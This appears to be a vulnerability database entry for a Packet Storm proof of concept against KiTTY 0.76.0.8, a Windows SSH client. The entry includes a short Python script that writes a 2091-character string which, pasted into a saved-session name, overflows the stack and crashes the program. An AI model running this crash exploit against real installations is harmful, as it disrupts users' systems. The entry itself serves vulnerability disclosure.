Lucene search
K

Kitty 0.76.0.8 Stack Buffer Overflow

🗓️ 19 Jun 2022 00:00:00Reported by Yehia ElghalyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 349 Views

Kitty 0.76.0.8 Buffer Overflow vulnerability in Window

Code
`# Exploit Title: Kitty 0.76.0.8 Stack Buffer Overflow  
# Discovered by: Yehia Elghaly  
# Discovered Date: 2022-06-08  
# Vendor Homepage: http://www.9bis.net/kitty/index.html#!index.md  
# Software Link : https://www.fosshub.com/KiTTY.html?dwl=kitty_portable-0.76.0.8.exe  
# Tested Version: 0.76.0.8  
# Vulnerability Type: Buffer Overflow  
# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64  
  
# Description: Kitty 0.76.0.8 Stack Buffer Overflow  
  
# Steps to reproduce:  
# 1. - Run the python script and it will create exploit.txt file.  
# 3. - Kitty 0.76.0.8  
# 4. - Sessions -> Save  
# 5. - Paste the characters of txt to Saved/Sessions then click save  
# 6. - Crashed  
# Note: ECX Overwwrite   
  
#!/usr/bin/python  
  
exploit = 'A' * 2091  
  
try:   
file = open("exploit.txt","w")  
file.write(exploit)  
file.close()  
  
print("POC is created")  
except:  
print("POC not created")  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

19 Jun 2022 00:00Current
0.8Low risk
Vulners AI Score0.8
349